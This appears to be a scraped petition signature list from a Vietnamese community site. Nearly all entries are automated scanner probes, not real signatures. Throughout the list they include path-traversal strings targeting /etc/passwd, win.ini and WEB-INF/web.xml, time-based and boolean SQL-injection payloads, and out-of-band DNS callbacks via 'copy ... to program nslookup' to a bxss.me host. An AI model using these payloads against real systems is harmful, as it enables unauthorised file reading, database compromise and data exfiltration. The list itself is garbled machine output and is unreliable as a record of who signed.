 1832. ../../../../../../../../../../etc/passwd.jpg, North-Western US,
 1833. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, North-Western US,
 1834. ../../../../../../../../../../../../../../../proc/version, North-Western US,
 1835. ../../../../../../../../../../etc/passwd, North-Western US,
 1836. etdyllec, North-Eastern US,
 1837. etdyllec, North-Eastern US,
 1838. etdyllec, North-Eastern US,
 1839. etdyllec, North-Eastern US,
 1840. etdyllec, North-Eastern US,
 1841. etdyllec, North-Eastern US,
 1842. etdyllec, North-Eastern US,
 1843. etdyllec, North-Eastern US,
 1844. etdyllec, North-Eastern US,
 1845. etdyllec, North-Eastern US,
 1846. etdyllec, North-Eastern US,
 1847. etdyllec, North-Eastern US,
 1848. etdyllec, North-Eastern US,
 1849. etdyllec, Mid-Southern US,
 1850. etdyllec, Mid-Southern US,
 1851. etdyllec, Mid-Southern US,
 1852. etdyllec, Mid-Southern US,
 1853. etdyllec, Mid-Southern US,
 1854. etdyllec, Mid-Southern US,
 1855. etdyllec, Mid-Southern US,
 1856. etdyllec, Mid-Southern US,
 1857. etdyllec, Mid-Southern US,
 1858. etdyllec, Mid-Southern US,
 1859. etdyllec, Mid-Southern US,
 1860. etdyllec, Mid-Southern US,
 1861. etdyllec, Mid-Southern US,
 1862. WEB-INFweb.xml, North-Eastern US,
 1863. WEB-INF/web.xml, North-Eastern US,
 1864. unexisting/../../../../../../../../../../windows/win.ini...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................., North-Eastern US,
 1865. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini, North-Eastern US,
 1866. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini, North-Eastern US,
 1867. /.\./.\./.\./.\./.\./.\./windows/win.ini, North-Eastern US,
 1868. ................windowswin.ini, North-Eastern US,
 1869. ................windowswin.ini, North-Eastern US,
 1870. windowswin.ini, North-Eastern US,
 1871. aseyvrtr, Australia Centre,
 1872. ../../../../../../../../../../windows/win.ini.jpg, North-Eastern US,
 1873. aseyvrtr, Australia Centre,
 1874. C:WINDOWSsystem32driversetchosts, North-Eastern US,
 1875. aseyvrtr, Australia Centre,
 1876. ../../../../../../../../../../windows/win.ini, North-Eastern US,
 1877. aseyvrtr, Australia Centre,
 1878. WEB-INFweb.xml, North-Eastern US,
 1879. aseyvrtr, Australia Centre,
 1880. aseyvrtr, Australia Centre,
 1881. /WEB-INF/web.xml, North-Eastern US,
 1882. WEB-INF/web.xml, North-Eastern US,
 1883. aseyvrtr, Australia Centre,
 1884. /../../../../../../../etc/passwd, North-Eastern US,
 1885. aseyvrtr, Australia Centre,
 1886. file:///etc/passwd, North-Eastern US,
 1887. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././., North-Eastern US,
 1888. ................etc/passwd, North-Eastern US,
 1889. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd, North-Eastern US,
 1890. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd, North-Eastern US,
 1891. /.././.././.././.././.././.././.././../etc/./passwd%00, North-Eastern US,
 1892. %2fetc%2fpasswd, North-Eastern US,
 1893. /etc/passwd, North-Eastern US,
 1894. .\./.\./.\./.\./.\./.\./etc/passwd, North-Eastern US,
 1895. /../..//../..//../..//../..//../..//etc/passwd.jpg, North-Eastern US,
 1896. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, North-Eastern US,
 1897. ../../../../../../../../../../etc/passwd.jpg, North-Eastern US,
 1898. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, North-Eastern US,
 1899. ../../../../../../../../../../../../../../../proc/version, North-Eastern US,
 1900. etdyllec, Canada Centre,
 1901. ../../../../../../../../../../etc/passwd, North-Eastern US,
 1902. aseyvrtr, Southern US,
 1903. etdyllec, Canada Centre,
 1904. aseyvrtr, Southern US,
 1905. etdyllec, Canada Centre,
 1906. aseyvrtr, Southern US,
 1907. etdyllec, Canada Centre,
 1908. aseyvrtr, Southern US,
 1909. etdyllec, Canada Centre,
 1910. etdyllec, Canada Centre,
 1911. aseyvrtr, Southern US,
 1912. aseyvrtr, Southern US,
 1913. etdyllec, Canada Centre,
 1914. aseyvrtr, Southern US,
 1915. etdyllec, Canada Centre,
 1916. aseyvrtr, Southern US,
 1917. etdyllec, Canada Centre,
 1918. etdyllec, Canada Centre,
 1919. etdyllec, Canada Centre,
 1920. etdyllec, Canada Centre,
 1921. etdyllec, Canada Centre,
 1922. etdyllec, Canada Centre,
 1923. etdyllec, Canada Centre,
 1924. etdyllec, Canada Centre,
 1925. etdyllec, Canada Centre,
 1926. etdyllec, Canada Centre,
 1927. etdyllec, Canada Centre,
 1928. etdyllec, Canada Centre,
 1929. etdyllec, Canada Centre,
 1930. etdyllec, Canada Centre,
 1931. etdyllec, Canada Centre,
 1932. etdyllec, Canada Centre,
 1933. etdyllec, Canada Centre,
 1934. aseyvrtr, South-Western US,
 1935. aseyvrtr, South-Western US,
 1936. aseyvrtr, South-Western US,
 1937. aseyvrtr, South-Western US,
 1938. aseyvrtr, South-Western US,
 1939. aseyvrtr, South-Western US,
 1940. aseyvrtr, South-Western US,
 1941. aseyvrtr, South-Western US,
 1942. aseyvrtr, South-Eastern US,
 1943. aseyvrtr, South-Eastern US,
 1944. aseyvrtr, South-Eastern US,
 1945. aseyvrtr, South-Eastern US,
 1946. aseyvrtr, South-Eastern US,
 1947. aseyvrtr, South-Eastern US,
 1948. aseyvrtr, South-Eastern US,
 1949. aseyvrtr, South-Eastern US,
 1950. etdyllec, 244',
 1951. etdyllec, Canada%20Centre';copy (select '') to program 'nslookup dns.sqli.37203.21-1502.21.84109.1.bxss.me,
 1952. etdyllec, '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1501.21.84109.1.bxss'||'.me')||',
 1953. etdyllec, dAw4hfSC'));select pg_sleep(18); -- ,
 1954. etdyllec, WlF0tE9k');select pg_sleep(18); -- ,
 1955. etdyllec, VTttI7kM';select pg_sleep(18); -- ,
 1956. etdyllec, Y0OhtGtV'; waitfor delay '0:0:6' -- ,
 1957. etdyllec, 1 waitfor delay '0:0:6' -- ,
 1958. etdyllec, (select(0)from(select(sleep(18)))v)/*'+(select(0)from(select(sleep(18)))v)+'"+(select(0)from(select(sleep(18)))v)+"*/,
 1959. aseyvrtr, North-Western US,
 1960. etdyllec, if(now()=sysdate(),sleep(18),0)/*'XOR(if(now()=sysdate(),sleep(18),0))OR'"XOR(if(now()=sysdate(),sleep(18),0))OR"*/,
 1961. aseyvrtr, North-Western US,
 1962. etdyllec, -1" OR 2+455-455-1=0+0+0+1 -- ,
 1963. aseyvrtr, North-Western US,
 1964. etdyllec, -1' OR 2+433-433-1=0+0+0+1 or 'lPc1lvua'=',
 1965. aseyvrtr, North-Western US,
 1966. etdyllec, -1' OR 2+77-77-1=0+0+0+1 -- ,
 1967. aseyvrtr, North-Western US,
 1968. etdyllec, -1 OR 2+682-682-1=0+0+0+1,
 1969. aseyvrtr, North-Western US,
 1970. etdyllec, -1 OR 2+383-383-1=0+0+0+1 -- ,
 1971. etdyllec, 4akwzJFS,
 1972. aseyvrtr, North-Western US,
 1973. WEB-INFweb.xml, Mid-Southern US,
 1974. aseyvrtr, North-Western US,
 1975. etdyllec, Canada%20Centre,
 1976. WEB-INF/web.xml, Mid-Southern US,
 1977. etdyllec, Canada%20Centre,
 1978. unexisting/../../../../../../../../../../windows/win.ini...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................., Mid-Southern US,
 1979. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini, Mid-Southern US,
 1980. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini, Mid-Southern US,
 1981. /.\./.\./.\./.\./.\./.\./windows/win.ini, Mid-Southern US,
 1982. ................windowswin.ini, Mid-Southern US,
 1983. ................windowswin.ini, Mid-Southern US,
 1984. windowswin.ini, Mid-Southern US,
 1985. ../../../../../../../../../../windows/win.ini.jpg, Mid-Southern US,
 1986. C:WINDOWSsystem32driversetchosts, Mid-Southern US,
 1987. ../../../../../../../../../../windows/win.ini, Mid-Southern US,
 1988. WEB-INFweb.xml, Mid-Southern US,
 1989. aseyvrtr, North-Eastern US,
 1990. /WEB-INF/web.xml, Mid-Southern US,
 1991. aseyvrtr, North-Eastern US,
 1992. aseyvrtr, North-Eastern US,
 1993. WEB-INF/web.xml, Mid-Southern US,
 1994. aseyvrtr, North-Eastern US,
 1995. aseyvrtr, North-Eastern US,
 1996. aseyvrtr, North-Eastern US,
 1997. /../../../../../../../etc/passwd, Mid-Southern US,
 1998. aseyvrtr, North-Eastern US,
 1999. file:///etc/passwd, Mid-Southern US,
 2000. aseyvrtr, North-Eastern US,
 2001. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././., Mid-Southern US,
 2002. ................etc/passwd, Mid-Southern US,
 2003. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd, Mid-Southern US,
 2004. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd, Mid-Southern US,
 2005. /.././.././.././.././.././.././.././../etc/./passwd%00, Mid-Southern US,
 2006. %2fetc%2fpasswd, Mid-Southern US,
 2007. /etc/passwd, Mid-Southern US,
 2008. 717', Australia Centre,
 2009. .\./.\./.\./.\./.\./.\./etc/passwd, Mid-Southern US,
 2010. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-1476.21.84109.1.bxss.me, Australia Centre,
 2011. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1471.21.84109.1.bxss'||'.me')||', Australia Centre,
 2012. /../..//../..//../..//../..//../..//etc/passwd.jpg, Mid-Southern US,
 2013. -1" OR 2+570-570-1=0+0+0+1 -- , Australia Centre,
 2014. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Mid-Southern US,
 2015. -1' OR 2+594-594-1=0+0+0+1 or 'eaZfFD9E'=', Australia Centre,
 2016. -1' OR 2+264-264-1=0+0+0+1 -- , Australia Centre,
 2017. ../../../../../../../../../../etc/passwd.jpg, Mid-Southern US,
 2018. -1 OR 2+636-636-1=0+0+0+1, Australia Centre,
 2019. -1 OR 2+537-537-1=0+0+0+1 -- , Australia Centre,
 2020. aseyvrtr, Mid-Southern US,
 2021. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Mid-Southern US,
 2022. JQGbyMyY, Australia Centre,
 2023. aseyvrtr, Mid-Southern US,
 2024. etdyllec, Australia Centre,
 2025. ../../../../../../../../../../../../../../../proc/version, Mid-Southern US,
 2026. aseyvrtr, Mid-Southern US,
 2027. etdyllec, Australia Centre,
 2028. ../../../../../../../../../../etc/passwd, Mid-Southern US,
 2029. aseyvrtr, Mid-Southern US,
 2030. aseyvrtr, Mid-Southern US,
 2031. aseyvrtr, Mid-Southern US,
 2032. aseyvrtr, Mid-Southern US,
 2033. aseyvrtr, Mid-Southern US,
 2034. aseyvrtr, Canada Centre,
 2035. 685', Southern US,
 2036. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-1454.21.84109.1.bxss.me, Southern US,
 2037. aseyvrtr, Canada Centre,
 2038. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1442.21.84109.1.bxss'||'.me')||', Southern US,
 2039. aseyvrtr, Canada Centre,
 2040. -1" OR 2+109-109-1=0+0+0+1 -- , Southern US,
 2041. aseyvrtr, Canada Centre,
 2042. -1' OR 2+957-957-1=0+0+0+1 or '0ZQGJb0G'=', Southern US,
 2043. -1' OR 2+564-564-1=0+0+0+1 -- , Southern US,
 2044. aseyvrtr, Canada Centre,
 2045. aseyvrtr, Canada Centre,
 2046. -1 OR 2+108-108-1=0+0+0+1, Southern US,
 2047. aseyvrtr, Canada Centre,
 2048. -1 OR 2+415-415-1=0+0+0+1 -- , Southern US,
 2049. aseyvrtr, Canada Centre,
 2050. i9RRMI1g, Southern US,
 2051. etdyllec, Southern US,
 2052. etdyllec, Southern US,
 2053. aseyvrtr, ''"",
 2054. aseyvrtr, '",
 2055. aseyvrtr, JyI=,
 2056. aseyvrtr, @@Zs5eI,
 2057. aseyvrtr, 1%2527%2522,
 2058. 406', South-Western US,
 2059. aseyvrtr, 1'",
 2060. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-1202.21.84109.1.bxss.me, South-Western US,
 2061. aseyvrtr, Canada%20Centre,
 2062. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1188.21.84109.1.bxss'||'.me')||', South-Western US,
 2063. -1" OR 2+722-722-1=0+0+0+1 -- , South-Western US,
 2064. -1' OR 2+768-768-1=0+0+0+1 or 'FS4Jekx0'=', South-Western US,
 2065. -1' OR 2+848-848-1=0+0+0+1 -- , South-Western US,
 2066. -1 OR 2+40-40-1=0+0+0+1, South-Western US,
 2067. -1 OR 2+968-968-1=0+0+0+1 -- , South-Western US,
 2068. yBWKeAaV, South-Western US,
 2069. etdyllec, South-Western US,
 2070. etdyllec, South-Western US,
 2071. ''"", Australia Centre,
 2072. '", Australia Centre,
 2073. JyI=, Australia Centre,
 2074. @@QStOA, Australia Centre,
 2075. ualwjlgs, Australia Centre,
 2076. 1%2527%2522, Australia Centre,
 2077. ualwjlgs, Australia Centre,
 2078. 1'", Australia Centre,
 2079. ualwjlgs, Australia Centre,
 2080. aseyvrtr, Australia Centre,
 2081. ualwjlgs, Australia Centre,
 2082. ualwjlgs, Australia Centre,
 2083. WEB-INFweb.xml, Canada Centre,
 2084. WEB-INF/web.xml, Canada Centre,
 2085. 599', South-Eastern US,
 2086. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-977.21.84109.1.bxss.me, South-Eastern US,
 2087. unexisting/../../../../../../../../../../windows/win.ini...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................., Canada Centre,
 2088. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-969.21.84109.1.bxss'||'.me')||', South-Eastern US,
 2089. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini, Canada Centre,
 2090. -1" OR 2+691-691-1=0+0+0+1 -- , South-Eastern US,
 2091. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini, Canada Centre,
 2092. -1' OR 2+546-546-1=0+0+0+1 or 'J62J22ro'=', South-Eastern US,
 2093. -1' OR 2+414-414-1=0+0+0+1 -- , South-Eastern US,
 2094. /.\./.\./.\./.\./.\./.\./windows/win.ini, Canada Centre,
 2095. -1 OR 2+338-338-1=0+0+0+1, South-Eastern US,
 2096. ................windowswin.ini, Canada Centre,
 2097. -1 OR 2+513-513-1=0+0+0+1 -- , South-Eastern US,
 2098. IaBYeDWU, South-Eastern US,
 2099. etdyllec, South-Eastern US,
 2100. ................windowswin.ini, Canada Centre,
 2101. etdyllec, South-Eastern US,
 2102. windowswin.ini, Canada Centre,
 2103. ualwjlgs, Southern US,
 2104. ualwjlgs, Southern US,
 2105. ../../../../../../../../../../windows/win.ini.jpg, Canada Centre,
 2106. ''"", Southern US,
 2107. ualwjlgs, Southern US,
 2108. C:WINDOWSsystem32driversetchosts, Canada Centre,
 2109. '", Southern US,
 2110. ualwjlgs, Southern US,
 2111. JyI=, Southern US,
 2112. ualwjlgs, Southern US,
 2113. ../../../../../../../../../../windows/win.ini, Canada Centre,
 2114. @@BYVEK, Southern US,
 2115. WEB-INFweb.xml, Canada Centre,
 2116. 1%2527%2522, Southern US,
 2117. /WEB-INF/web.xml, Canada Centre,
 2118. WEB-INF/web.xml, Canada Centre,
 2119. 1'", Southern US,
 2120. aseyvrtr, Southern US,
 2121. /../../../../../../../etc/passwd, Canada Centre,
 2122. file:///etc/passwd, Canada Centre,
 2123. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././., Canada Centre,
 2124. ................etc/passwd, Canada Centre,
 2125. ualwjlgs, South-Western US,
 2126. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd, Canada Centre,
 2127. ualwjlgs, South-Western US,
 2128. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd, Canada Centre,
 2129. ualwjlgs, South-Western US,
 2130. /.././.././.././.././.././.././.././../etc/./passwd%00, Canada Centre,
 2131. ualwjlgs, South-Western US,
 2132. %2fetc%2fpasswd, Canada Centre,
 2133. ualwjlgs, South-Western US,
 2134. /etc/passwd, Canada Centre,
 2135. .\./.\./.\./.\./.\./.\./etc/passwd, Canada Centre,
 2136. 322', North-Western US,
 2137. /../..//../..//../..//../..//../..//etc/passwd.jpg, Canada Centre,
 2138. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-854.21.84109.1.bxss.me, North-Western US,
 2139. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Canada Centre,
 2140. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-851.21.84109.1.bxss'||'.me')||', North-Western US,
 2141. ../../../../../../../../../../etc/passwd.jpg, Canada Centre,
 2142. -1" OR 2+701-701-1=0+0+0+1 -- , North-Western US,
 2143. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Canada Centre,
 2144. -1' OR 2+854-854-1=0+0+0+1 or 'e2zlaKXX'=', North-Western US,
 2145. ../../../../../../../../../../../../../../../proc/version, Canada Centre,
 2146. -1' OR 2+384-384-1=0+0+0+1 -- , North-Western US,
 2147. ualwjlgs, South-Eastern US,
 2148. -1 OR 2+565-565-1=0+0+0+1, North-Western US,
 2149. ../../../../../../../../../../etc/passwd, Canada Centre,
 2150. ualwjlgs, South-Eastern US,
 2151. -1 OR 2+160-160-1=0+0+0+1 -- , North-Western US,
 2152. ''"", South-Western US,
 2153. ualwjlgs, South-Eastern US,
 2154. '", South-Western US,
 2155. ualwjlgs, South-Eastern US,
 2156. fjiufdkm, Australia Centre,
 2157. Sh4pFFwK, North-Western US,
 2158. JyI=, South-Western US,
 2159. ualwjlgs, South-Eastern US,
 2160. @@mXKQv, South-Western US,
 2161. fjiufdkm, Australia Centre,
 2162. etdyllec, North-Western US,
 2163. 1%2527%2522, South-Western US,
 2164. etdyllec, North-Western US,
 2165. fjiufdkm, Australia Centre,
 2166. fjiufdkm, Australia Centre,
 2167. 1'", South-Western US,
 2168. aseyvrtr, South-Western US,
 2169. fjiufdkm, Southern US,
 2170. ualwjlgs, North-Western US,
 2171. fjiufdkm, Southern US,
 2172. fjiufdkm, Southern US,
 2173. ualwjlgs, North-Western US,
 2174. fjiufdkm, Southern US,
 2175. ualwjlgs, North-Western US,
 2176. ualwjlgs, North-Western US,
 2177. ualwjlgs, North-Western US,
 2178. qrptiygk, Australia Centre,
 2179. qrptiygk, Australia Centre,
 2180. fjiufdkm, South-Western US,
 2181. qrptiygk, Australia Centre,
 2182. qrptiygk, Australia Centre,
 2183. fjiufdkm, South-Western US,
 2184. qrptiygk, Australia Centre,
 2185. fjiufdkm, South-Western US,
 2186. ''"", South-Eastern US,
 2187. fjiufdkm, South-Western US,
 2188. '", South-Eastern US,
 2189. ualwjlgs, North-Eastern US,
 2190. ualwjlgs, North-Eastern US,
 2191. 89', North-Eastern US,
 2192. JyI=, South-Eastern US,
 2193. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-762.21.84109.1.bxss.me, North-Eastern US,
 2194. ualwjlgs, North-Eastern US,
 2195. @@ybGYE, South-Eastern US,
 2196. ualwjlgs, North-Eastern US,
 2197. 1%2527%2522, South-Eastern US,
 2198. ualwjlgs, North-Eastern US,
 2199. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-760.21.84109.1.bxss'||'.me')||', North-Eastern US,
 2200. 1'", South-Eastern US,
 2201. aseyvrtr, South-Eastern US,
 2202. -1" OR 2+53-53-1=0+0+0+1 -- , North-Eastern US,
 2203. fjiufdkm, South-Eastern US,
 2204. -1' OR 2+70-70-1=0+0+0+1 or 'D752lWuP'=', North-Eastern US,
 2205. fjiufdkm, South-Eastern US,
 2206. -1' OR 2+985-985-1=0+0+0+1 -- , North-Eastern US,
 2207. fjiufdkm, South-Eastern US,
 2208. qrptiygk, Southern US,
 2209. fjiufdkm, South-Eastern US,
 2210. -1 OR 2+229-229-1=0+0+0+1, North-Eastern US,
 2211. qrptiygk, Southern US,
 2212. -1 OR 2+987-987-1=0+0+0+1 -- , North-Eastern US,
 2213. qrptiygk, Southern US,
 2214. R9DtJ4PK, North-Eastern US,
 2215. qrptiygk, Southern US,
 2216. etdyllec, North-Eastern US,
 2217. qrptiygk, Southern US,
 2218. ualwjlgs, Mid-Southern US,
 2219. etdyllec, North-Eastern US,
 2220. ualwjlgs, Mid-Southern US,
 2221. ualwjlgs, Mid-Southern US,
 2222. ualwjlgs, Mid-Southern US,
 2223. ualwjlgs, Mid-Southern US,
 2224. fjiufdkm, North-Western US,
 2225. fjiufdkm, North-Western US,
 2226. fjiufdkm, North-Western US,
 2227. fjiufdkm, North-Western US,
 2228. ''"", North-Western US,
 2229. qrptiygk, South-Western US,
 2230. '", North-Western US,
 2231. qrptiygk, South-Western US,
 2232. JyI=, North-Western US,
 2233. qrptiygk, South-Western US,
 2234. ualwjlgs, Canada Centre,
 2235. @@l1etn, North-Western US,
 2236. orrilrkr, Australia Centre,
 2237. ualwjlgs, Canada Centre,
 2238. 1%2527%2522, North-Western US,
 2239. orrilrkr, Australia Centre,
 2240. qrptiygk, South-Western US,
 2241. fjiufdkm, North-Eastern US,
 2242. ualwjlgs, Canada Centre,
 2243. ualwjlgs, Canada Centre,

---------o0o---------

Danh Sách Quý Văn Hữu ký tên Không ý kiến:

 1. jpvamwrj, Australia Centre,
 2. jpvamwrj, Australia Centre,
 3. jpvamwrj, Australia Centre,
 4. jpvamwrj, Australia Centre,
 5. jpvamwrj, Australia Centre,
 6. jpvamwrj, Australia Centre,
 7. jpvamwrj, Australia Centre,
 8. jpvamwrj, Australia Centre,
 9. jpvamwrj, Australia Centre,
 10. jpvamwrj, Australia Centre,
 11. jpvamwrj, Australia Centre,
 12. jpvamwrj, Australia Centre,
 13. jpvamwrj, Australia Centre,
 14. jpvamwrj, Australia Centre,
 15. jpvamwrj, Australia Centre,
 16. jpvamwrj, Australia Centre,
 17. jpvamwrj, Australia Centre,
 18. jpvamwrj, Australia Centre,
 19. jpvamwrj, Australia Centre,
 20. jpvamwrj, Australia Centre,
 21. jpvamwrj, Australia Centre,
 22. jpvamwrj, Australia Centre,
 23. jpvamwrj, Australia Centre,
 24. jpvamwrj, Australia Centre,
 25. jpvamwrj, Australia Centre,
 26. jpvamwrj, Australia Centre,
 27. jpvamwrj, Australia Centre,
 28. jpvamwrj, Australia Centre,
 29. jpvamwrj, Australia Centre,
 30. jpvamwrj, Australia Centre,
 31. jpvamwrj, Australia Centre,
 32. jpvamwrj, Southern US,
 33. jpvamwrj, Southern US,
 34. jpvamwrj, Southern US,
 35. jpvamwrj, Southern US,
 36. jpvamwrj, Southern US,
 37. jpvamwrj, Southern US,
